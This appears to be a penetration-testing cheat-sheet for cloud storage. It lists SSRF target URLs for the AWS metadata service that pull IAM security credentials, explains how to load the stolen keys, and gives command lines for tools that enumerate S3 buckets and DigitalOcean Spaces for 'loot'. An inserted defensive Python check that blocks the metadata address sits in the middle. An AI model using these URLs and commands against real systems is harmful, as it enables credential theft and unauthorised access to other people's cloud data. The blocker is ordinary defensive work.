Look for static content referenced in the HTML: it may be hosted on an S3 bucket, for example, which you can then exploit.
AWS Bucket access (SSRF for example)
# You can get information and secrets about an S3 bucket
# Credentials, main goal
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2toS3/
# You might need the zone
http://169.254.169.254/latest/dynamic/instance-identity/document
# Then set
# AWS_ACCESS_KEY_ID
# AWS_SECRET_ACCESS_KEY
# AWS_DEFAULT_REGION
# AWS_SESSION_TOKEN
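
On the defending side, a server-side fetcher can refuse any URL whose host denotes the metadata address requested above, whatever notation the host is written in. This is an added example, not part of the original notes; `BLOCKED_NETS`, `host_to_ip` and `classify` are hypothetical names and the sample URLs are constructed.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges an application-side fetcher should never reach: IPv4 link-local
# (contains 169.254.169.254) and the IPv6 address of the metadata service.
BLOCKED_NETS = [
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("fd00:ec2::254/128"),
]


def host_to_ip(host):
    """Return the address a literal host denotes, or None for a DNS name."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        try:
            # inet_aton parses the same numeric host forms libc-based HTTP
            # clients accept (single integer, hex, short forms); no DNS lookup.
            ip = ipaddress.ip_address(socket.inet_aton(host))
        except OSError:
            return None
    # Unwrap ::ffff:a.b.c.d so it is compared as the IPv4 address it carries.
    mapped = getattr(ip, "ipv4_mapped", None)
    return mapped if mapped is not None else ip


def classify(url):
    """Return 'block', 'allow' or 'resolve-then-recheck' for an outbound URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "block"
    ip = host_to_ip(parts.hostname)
    if ip is None:
        # DNS name: the resolved address must pass this same check before
        # the connection is made, and the connection must use that address.
        return "resolve-then-recheck"
    return "block" if any(ip in net for net in BLOCKED_NETS) else "allow"


if __name__ == "__main__":
    # Constructed sample inputs.
    for sample in (
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://2852039166/latest/dynamic/instance-identity/document",
        "https://example.com/logo.png",
    ):
        print(classify(sample), sample)
```

Requiring IMDSv2 session tokens on the instance is a complementary control, since this check only covers fetches that pass through the application.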
Amazon S3 (AWS) Buckets
# Tools like AWSBucketDump can enumerate AWS S3 buckets
https://github.com/jordanpotti/AWSBucketDump
Teh S3 Bucketeers
https://github.com/tomdev/teh_s3_bucketeers/
# You need an AWS account and set your API key in ~/.aws/credentials
[default]
aws_access_key_id = <key>
aws_secret_access_key = <secret>
# Then just run it
./bucketeer.sh <target> <target>
# Find interesting Amazon S3 Buckets by watching certificate transparency logs.
# This tool simply listens to various certificate transparency logs (via certstream)
# and attempts to find public S3 buckets from permutations of the certificate's domain name
# Basic
python3 bucket-stream.py
# You can put credentials / API key in the config.yaml file and the tool will try to authenticate and identify bucket owners
# Spaces finder is a tool to quickly enumerate DigitalOcean Spaces to look for loot.
# It's similar to a subdomain bruteforcer but is made specifically for DigitalOcean Spaces
# Use SecLists as wordlists
# If targeting a specific company, use the enumall tool to get a wordlist
python3 spaces_finder.py -l SpacesNames.txt -g interesting_keywords.txt -D -m 500000 -d 1 -t 5